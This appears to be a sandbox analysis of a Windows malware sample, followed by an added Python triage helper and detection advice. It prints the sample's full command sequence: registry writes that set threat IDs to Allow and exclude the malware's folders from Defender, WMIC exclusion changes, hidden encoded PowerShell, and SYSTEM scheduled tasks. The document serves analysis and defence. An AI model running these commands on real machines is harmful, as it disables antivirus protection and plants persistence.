"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUFbOeYUT" /SC once /ST 10:54:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUFbOeYUT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gUFbOeYUT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 13:57:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe\" F0 /Ggsite_idYxJ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe F0 /Ggsite_idYxJ 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\UTmTfNY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 06:58:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll\",#1 /FIsite_idzJb 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"
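
The command lines above record one Defender-tampering sequence. forfiles.exe launches cmd.exe, which launches powershell.exe, which launches WMIC.exe to add an .exe extension exclusion through the MSFT_MpPreference class. powershell.exe then spawns reg.exe to write, under the Defender policy key and in both the 32-bit and 64-bit registry views, ThreatIDDefaultAction values of 6 (the Allow action code) for 14 threat IDs and Exclusions\Paths entries for the directories the installer drops into. A scheduled task created as Admin runs an encoded PowerShell command whose base64 payload is UTF-16LE for start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe /force process that follows and is what makes the new policy values take effect. The remaining schtasks entries run the dropped executables and a rundll32 DLL export as SYSTEM, and at the end the same forfiles chain removes the .exe extension exclusion again. The script below is an added triage helper, not part of the sandbox report or of the sample: it takes a list of command lines (a constructed subset of the lines above is embedded as sample input), decodes any -EncodedCommand payload, extracts the Defender policy writes, the WMIC exclusion calls and the task definitions, and returns them as a summary. Function and variable names are the example's own; the action-code table is the one the ThreatIDDefaultAction policy and Set-MpPreference use (6 = Allow).

```python
"""Added triage helper (not part of the sandbox report): summarise Defender tampering,
scheduled tasks and encoded PowerShell found in a list of Windows command lines."""
import base64
import re

# Constructed sample input: a subset of the command lines listed under Processes above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    r'schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe\" 1V /LPsite_idWmK 385118 /S" /V1 /F',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gUFbOeYUT" /SC once /ST 10:54:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F',
]

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
# Action codes accepted by the ThreatIDDefaultAction policy (same codes Set-MpPreference uses).
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

_REG_ADD = re.compile(r'reg(?:\.exe)?"?\s+ADD\s+"(?P<key>[^"]+)"\s+.*?/v\s+'
                      r'(?:"(?P<vq>[^"]+)"|(?P<v>\S+)).*?/d\s+(?P<d>\S+)', re.IGNORECASE)
_WMIC_MP = re.compile(r"MSFT_MpPreference\s+call\s+(Add|Remove)\s+Exclusion(\w+)=(\S+)", re.IGNORECASE)
_ENC = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_TN = re.compile(r'/TN\s+"?([^"\s]+)"?', re.IGNORECASE)
_RU = re.compile(r'/RU\s+"?([^"\s]+)"?', re.IGNORECASE)
_TR = re.compile(r'/TR\s+"((?:\\"|[^"])*)"', re.IGNORECASE)  # tolerates \" escapes inside /TR


def decode_encoded_command(cmdline):
    """Return the plaintext of a powershell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = _ENC.search(cmdline)
    return base64.b64decode(m[1]).decode("utf-16-le") if m else None


def triage(cmdlines):
    """Walk the command lines once and collect the tampering indicators a responder needs."""
    out = {"threat_ids_allowed": set(), "path_exclusions": [],
           "extension_exclusions": [], "tasks": [], "decoded_commands": []}
    for line in cmdlines:
        m = _REG_ADD.search(line)
        if m and m["key"].lower().startswith(DEFENDER_POLICY.lower()):
            subkey = m["key"][len(DEFENDER_POLICY):].lstrip("\\").lower()
            name = m["vq"] or m["v"]
            # ThreatIDDefaultAction: the value name is the threat ID, the data is the action code.
            if subkey == r"threats\threatiddefaultaction" and THREAT_ACTIONS.get(m["d"]) == "Allow":
                out["threat_ids_allowed"].add(int(name))
            # Exclusions\Paths: the value name is the excluded path; data 0 only marks it present.
            elif subkey == r"exclusions\paths" and name not in out["path_exclusions"]:
                out["path_exclusions"].append(name)
        m = _WMIC_MP.search(line)
        if m and m[2].lower() == "extension":
            out["extension_exclusions"].append((m[1].capitalize(), m[3]))
        decoded = decode_encoded_command(line)
        if decoded:
            out["decoded_commands"].append(decoded)
        if re.search(r"schtasks\s+/CREATE\b", line, re.IGNORECASE):
            tn, ru, tr = _TN.search(line), _RU.search(line), _TR.search(line)
            out["tasks"].append({"name": tn[1] if tn else None,
                                 "run_as": ru[1] if ru else None,
                                 "action": tr[1].replace('\\"', '"') if tr else None,
                                 "decoded_command": decoded})
    out["threat_ids_allowed"] = sorted(out["threat_ids_allowed"])
    return out


def system_tasks(summary):
    """Names of tasks registered to run as SYSTEM (the persistence and elevation vector here)."""
    return [t["name"] for t in summary["tasks"] if (t["run_as"] or "").upper() == "SYSTEM"]


if __name__ == "__main__":
    s = triage(SAMPLE_CMDLINES)
    print("threat IDs set to Allow :", s["threat_ids_allowed"])
    print("path exclusions         :", s["path_exclusions"])
    print("extension exclusions    :", s["extension_exclusions"])
    print("decoded PowerShell      :", s["decoded_commands"])
    print("tasks running as SYSTEM :", system_tasks(s))
```

On a live host the same three artifacts are the ones to check: the value names under the Threats\ThreatIDDefaultAction and Exclusions\Paths policy keys, the ExclusionExtension/ExclusionPath lists reported by Get-MpPreference, and any scheduled task whose principal is SYSTEM and whose action points into Temp, ProgramData or a randomly named Program Files (x86) directory. Note that the policy values are written to both registry views and the .exe extension exclusion is removed again at the end of the run, so a check that only looks at the live MpPreference exclusions after the fact will miss the window in which the droppers ran unscanned.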

Network

Country  Destination           Domain                              Proto
US       8.8.8.8:53            28.118.140.52.in-addr.arpa          udp
US       8.8.8.8:53            240.197.17.2.in-addr.arpa           udp
US       8.8.8.8:53            71.159.190.20.in-addr.arpa          udp
US       138.91.171.81:80      -                                   tcp
US       8.8.8.8:53            104.219.191.52.in-addr.arpa         udp
US       8.8.8.8:53            183.59.114.20.in-addr.arpa          udp
US       8.8.8.8:53            18.31.95.13.in-addr.arpa            udp
US       8.8.8.8:53            28.143.109.104.in-addr.arpa         udp
US       8.8.8.8:53            159.113.53.23.in-addr.arpa          udp
US       8.8.8.8:53            79.121.231.20.in-addr.arpa          udp
N/A      224.0.0.251:5353      -                                   udp
US       8.8.8.8:53            249.197.17.2.in-addr.arpa           udp
US       8.8.8.8:53            service-domain.xyz                  udp
